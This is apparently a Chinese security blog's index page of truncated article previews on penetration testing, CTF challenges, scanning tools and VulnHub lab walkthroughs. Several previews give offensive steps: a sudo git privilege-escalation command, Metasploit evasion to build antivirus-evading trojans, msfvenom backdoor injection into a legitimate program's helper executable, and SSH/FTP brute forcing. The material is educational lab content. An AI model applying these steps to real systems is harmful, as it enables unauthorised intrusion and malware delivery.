保持微笑的博客

渗透测试-ctfshow 爆破(web入门）

上篇文章我们介绍了这7个工具，这里简单的介绍一下。用来检测图片中是否有隐藏的文件。将图片中的隐藏文件拆分出来。①修改图片的参数来查看隐藏信息。②查看压缩包是否是伪加密。图片隐写查看神器。1个图片解密的工具暴力破解压缩包的工具。专门用来破解伪加密的一个工具。这里再分享几个工具。

每天，我会在每日的正常工作外，去学习一些新的知识，从最初的渗透测试基础（web、公众号、小程序和app），到现在自学CTF知识，学习使用更多的安全工具和插件，开始接触安全评审以及安全检查。我的未来规划是掌握基本的渗透测试能力，定期参加ctf比赛，往红蓝队方向发展。每天都在进步，每天都在成长，每天都变得越来越优秀。提示：可以和大家分享最初成为创作者的初心。在创作的过程中的收获。

渗透测试-CTF文件类型操作

渗透测试CTF-流量分析

图片隐写详细教程

1.phpstudy是什么？phpstudy是一个php运行环境的集成包，用户不需要去配置运行环境，就可以使用，phpstudy不仅是一款比较好用的php调试环境工具，并且还包括了开发工具和常用手册，对于新手是有很大帮助的。2.phpstudy下载地址 https://www.xp.cn/3.phpstudy的使用教程1.打开软件，启动Apache和MySQL服务。2.点击网站，点击管理里的根..

1.Nessus软件是什么？如图，我们可以从百度百科得知：Nessus 是全世界最多人使用的系统漏洞扫描与分析软件。总共有超过75,000个机构使用Nessus 作为扫描该机构电脑系统的软件。2.Nessus软件的安装1.下载地址Download Nessus | Tenable®https://www.tenable.com/downloads/nessus如图所示，这个是下载官网。我们以kali系统为例。点击下载，然后将Nessus-10.0.2-debian..

渗透测试之安全手册

BRUP插件：漏洞挖掘插件：Autorize、CSRF Token Tracker、XSS Validator、Turbo Intruder辅助插件：HaE、sqlmap4brup++、hackbar、Software Vulnerability Scanner浏览器插件： wappalyzer、MySSL、Cookie Editor脚本：1.图形化渗透测试工具集——GUI_Tools5.ip解码6.awvs批量扫描。

目录1.apkTool.jar2.dex2.jar3.jd-gu下载地址：链接：https://pan.baidu.com/s/1iP09qrX6CsMXbWp4ObbcRA提取码：0tmj需要三个工具：1.apkTool.jar使用*“apkTool.jar"去反编译apk拿到xml、照片等。新建一个文件apktool.bat，然后将下面的代码复制进去。@echo offset PATH=%CD%;%PATH%;java -j...

面试过很多次渗透测试岗位，整理的面试题改了又改，这是我的最终版本，绝对的干货，记得收藏保存。渗透测试流程首先拿到书面权限。(1)信息收集1.获取域名的 whois 信息,获取注册者邮箱姓名电话等。 2.查询服务器旁站以及子域名站点，因为主站一般比较难，所以先看看旁站有没有通用性的 cms 或者其他漏洞。 3.查看服务器操作系统版本，web中间件，看看是否存在已知的漏洞，比如 IIS，APACHE,NGINX 的解析漏洞 4.查看IP，进行IP地址端口扫描，对响应的端口进行漏洞探测，比如m

1.dirsearch目录扫描2.OneForAll-master资产收集3.sqlmap4.awvs批量扫描5.ip解码注意：在使用之前将自己的电脑先安装好python2x和python3x的环境。下载链接：链接：https://pan.baidu.com/s/1Tz_pd7I6zsrKd5IaXGu6zQ提取码：wsvu--来自百度网盘超级会员V2的分享1.dirsearch目录扫描Dirsearch是一个用于探测WEB服务器下的敏感文件/目录的命令行...

目录1.什么是文件上传漏洞2.生成图片木马3.靶场1.第一关2.前端检测(第二关)3.服务器端检测--MIME类型（第二关）4.服务器端检测--文件类型（第十四关）5.服务器文件内容验证-文件头6.服务器端检测后缀名（黑白名单）7.%00截断（第11关）8.htaccess攻击9.web解析漏洞10.编辑器上传漏洞1.什么是文件上传漏洞文件上传漏洞是指文件上传功能没有对上传的文件做合理严谨的过滤，导致用户可以利用此功能，上传能被服务端解析执行.

DC靶场的下载、安装与访问在上一篇的文章中。2022-渗透测试-DC靶场的下载、安装与访问_保持微笑的博客-优快云博客https://blog.youkuaiyun.com/qq_38612882/article/details/122779202靶场攻略:1、使用nmap快速扫描的命令：nmap -sP --min-hostgroup 1024 --min-parallelism 1024 192.168.120.0/24识别到靶场主机ip2.使用命令：nmap -A -p-..

DC靶场的下载、安装与访问在上一篇的文章中。2022-渗透测试-DC靶场的下载、安装与访问_保持微笑的博客-优快云博客https://blog.youkuaiyun.com/qq_38612882/article/details/122779202靶场攻略:1、使用nmap快速扫描的命令：nmap -sP --min-hostgroup 1024 --min-parallelism 1024 192.168.120.0/24识别到靶场主机ip2.使用命令：nmap -A -p- .

目录1.nessus2.AWVS3.WPscan1.nessus1.Nessus软件是什么？如图，我们可以从百度百科得知：Nessus 是全世界最多人使用的系统漏洞扫描与分析软件。总共有超过75,000个机构使用Nessus 作为扫描该机构电脑系统的软件。2.Nessus软件的安装1.下载地址Download Nessus | Tenable®https://www.tenable.com/downloads/nessus如图所示，这个是下载官网。我们以..

目录AWVS简介AWVS功能介绍AWVS的安装AWVS的使用AWVS简介AWVS是一个自动化的Web应用程序安全测试工具，它可以扫描任何可通过Web浏览器访问的和遵循HTTP/HTTPS规则的Web站点和Web应用程序。适用于任何中小型和大型企业的内联网、外延网和面向客户、雇员、厂商和其它人员的Web网站。AWVS可以通过检查SQL注入攻击漏洞、XSS跨站脚本攻击漏洞等漏洞来审核Web应用程序的安全性。AWVS功能介绍WebScanner ：核心功能，web安全漏洞.

DC靶场的下载、安装与访问在上一篇的文章中。(1条消息) 2022-渗透测试-DC靶场的下载、安装与访问_保持微笑的博客-优快云博客https://blog.youkuaiyun.com/qq_38612882/article/details/122779202靶场攻略:1、使用nmap快速扫描的命令：nmap -sP --min-hostgroup 1024 --min-parallelism 1024 192.168.120.0/24识别到靶场主机ip2.使用命令：nmap -A.

DC靶场的下载、安装与访问在上一篇的文章中。2022-渗透测试-DC靶场的下载、安装与访问_保持微笑的博客-优快云博客https://blog.youkuaiyun.com/qq_38612882/article/details/122779202靶场攻略:1、使用nmap快速扫描的命令：nmap -sP --min-hostgroup 1024 --min-parallelism 1024 192.168.120.0/24识别到靶场主机ip2.使用命令：nmap -A -p- -T4 1.

自己整理的最新渗透测试面试题

DC靶场的下载、安装与访问在上一篇的文章中。2022-渗透测试-DC靶场的下载、安装与访问_保持微笑的博客-优快云博客https://blog.youkuaiyun.com/qq_38612882/article/details/122779202?spm=1001.2014.3001.5501靶场攻略:1、使用nmap快速扫描的命令：nmap -sP --min-hostgroup 1024 --min-parallelism 1024 192.168.120.0/24识别到靶场主机ip.

目录1.DC靶场下载2.DC靶场的安装3.DC靶场的访问1.DC靶场下载下载链接如下Vulnerable By Design - Search: dc (Page 2) ~ VulnHubhttps://www.vulnhub.com/?page=2&q=dcDC靶场一共有9个，对于学习渗透测试人员，有很大的帮助，是非常不错的靶场。2.DC靶场的安装以DC-1为例，将文件解压。打开虚拟机，选择解压好的文件导入虚拟机...

目录1.什么是提权2.git提权命令3.git的使用1.什么是提权提权就是通过各种办法和漏洞，提高自己在服务器中的权限，以便控制全局。利用漏洞的最终目的是获取被测系统的最高权限，即Windows中管理员账户的权限，或Linux中root账户的权限。2.git提权命令sudo git help config !/bin/bash或者！'sh'完成提权sudo git -p help !/bin/bash3.git的使用这里以DC-2靶场为例。 .

目录WPscan简介WPscan工具利用查看帮助信息更新漏洞库扫描WordPress漏洞扫描wordpress用户扫描所使用的主题和漏洞指定字典暴力破解密码WPscan简介WPScan是Kali Linux默认自带的一款漏洞扫描工具，它可以全面检查wp网站的漏洞，从而能够及时应对修补漏洞避免被黑掉的危险。同时还可以实现对未加防护的Wordpress站点暴力破解用户名密码。WPscan工具利用查看帮助信息wpscan -h更新漏洞库wps.

目录Cewl简介Cewl命令参数Cewl的使用默认方法将生成的字典存储在文件中计算网站中单词出现的次数增加爬取深度提取调试信息Verbose模式生成包含数字和字符的字典Cewl摘要/基础认证代理URLCewl简介Cewl是一款采用Ruby开发的应用程序，你可以给它的爬虫指定URL地址和爬取深度，还可以添额外的外部链接，接下来Cewl会给你返回一个字典文件，然后可以用于密码破解。Cewl命令参数cewl [选项] ... URL...

目录漏洞简介影响范围威胁级别漏洞复现漏洞修复漏洞简介Polkit（PolicyKit）是一个用于控制类Unix系统中控制系统范围权限的组件，它为非特权进程与特权进程的通信提供了一种有组织的方式。pkexec是Polkit开源应用框架的一部分，它负责协商特权进程和非特权进程之间的互动，允许授权用户以另一个用户的身份执行命令，是sudo的替代方案。1月25日，研究人员公开披露了在 polkit 的 pkexec 中发现的一个权限提升漏洞（CVE-2021-4034 ，也称Pw.

目录1.dirb2.dirbuster3.ffuf1.dirbdirb我之前写过一篇博客，这里再详细介绍一下。dirb简介dirb是一个基于字典的web目录扫描工具，采用递归的方式来获取更多的目录，可以查找到已知的和隐藏的目录，它还支持代理和http认证限制访问的网站在渗透测试过程中，是一个非常好用的工具。dirb命令参数格式：dirb <url_base> [<wordlist_file(s)>] [options] -a 设置user.

1.isset()函数用于检测变量是否已设置并且非 NULL。2.extract()函数从数组中将函数导入当前列表，将数组的键当作变量名，数组的值当作对应变量的值。3.file_get_contents() 函数把整个文件读入一个字符串中。4.eval()函数把字符串按照php代码计算5.assert()函数判断一个表达式是否成立，返回true or false。6.preg_replace() 函数执行一个正则表达式的搜索和替换。7.call_user_fu

目录dirb简介dirb命令参数dirb基本使用dirb简介dirb是一个基于字典的web目录扫描工具，采用递归的方式来获取更多的目录，可以查找到已知的和隐藏的目录，它还支持代理和http认证限制访问的网站在渗透测试过程中，是一个非常好用的工具。dirb命令参数格式：dirb <url_base> [<wordlist_file(s)>] [options]-a 设置user-agent-p <proxy[:port]>设置代理.

一次完整的渗透测试

目录1.Wireshark2.Metasploit3.Nmap4.Nessus5.SQL Map6.W3af1.WiresharkWireshark（前称Ethereal）是一个网络分包分析软件，是世界上使用最多的网络协议分析器。Wireshark 兼容所有主要的操作系统，如 Windows、Linux、macOS 和 Solaris。kali系统里面自带有这个软件，我们可以直接使用；或者可以在网上下载windows版本，在windows系统里使用。..

1.CUPP（kali）首先，安装cupp软件apt install -y cupp新建一个文件夹，用于保存生成的字典输入 cupp -i 命令开始编辑生成字典根据自己已知的信息，生成字典。查看生成的字典 cat san.txt2.亦思社会工程学学点生成器3.一句话密码破解工具4.crunch（kali） crunch是kali自带的工具，是一种创建密码字典的工具。按照指定的规则生成密码字典，可以灵活的定制自己的字典文件。...

1.堆叠注入原理平常我们注入时都是通过对原来sql语句传输数据的地方进行相关修改，注入情况会因为该语句本身的情况而受到相关限制，例如一个select语句，那么我们注入时也只能执行select操作，无法进行增、删、改，其他语句也同理，所以可以说我们能够注入的十分有限。但堆叠注入则完全打破了这种限制，其名字顾名思义，就是可以堆一堆sql注入进行注入，这个时候我们就不受前面语句的限制可以为所欲为了。其原理也很简单，就是将原来的语句构造完后加上分号，代表该语句结束，后面在输入的就是一个全新的sql语句了，这

1.evasion简介evasion是metasploit自带的模块，使用此模块可以生成反杀毒软件的木马。2.操作流程打开kali系统的Metasploit软件。如图，我们可以看到evasion中有7个模块查看模块 search evasion使用模块use evasion/windows/windows_defender_exe查看需要配置的参数 show options生成软件set FILENAME 666.exe指定一个payloadset ...

1.下载一个正常的软件我们这里以迅雷为例安装迅雷，打开软件，启动任务管理器，查看进程。如图所示，在迅雷启动的同时，会自动启动一个迅雷下载引擎DodnloadSDKServer.exe *32软件，这时我们就可以在这个软件里面直入后门，也就是给子程序捆绑后门。注：不要对主软件进行后门植入，以免造成软件不能正常使用。2.将迅雷的子程序上传到kali系统的根目录下3.对子程序注入payload后门程序命令：msfvenom -a x86 --platform window

1.客户端渗透原理在我们无法突破对方的网络边界的时候，往往需要使用客户端渗透这种方式对目标发起攻击。实验环境：一台kali，一台win7，两台主机是在一个局域网内。

目录1.查看FTP服务的版本信息2.通过FTP拿到root权限3.ftp匿名登陆扫描4.ftp暴力破解1.查看FTP服务的版本信息1.打开kali系统的Metasploit软件。2.查找模块 search ftp_version3.使用模块4.查看需要配置的参数 show options5.设置目标主机--靶机 set RHOSTS 192.168.0.1126.run如图，我们可以得知ftp的版本号是2.3.42.通过FTP...

1.查看SSH服务的版本信息search version2.useauxiliary/scanner/ssh/ssh_version3.show options4.set RHOSTS 192.168.0.112 设置目标主机-靶机5.run版本是：SSH server version: SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu12.对ssh进行暴力破解1.search ssh_login2.使用模块us...

SMB概述：服务器消息块，又称网络文件共享系统，一种应用层网络传输协议，由微软开发，主要功能是使网络上的机器能够共享计算机文件、打印机、串行端口和通讯等资源。1.使用smb_version 基于SMB协议扫描版本search smb_versionuse auxiliary/scanner/smb/smb_versionshow optionsset RHOSTS 192.168.0.110, 192.168.0.112注意：逗号后面需要加一个空格run...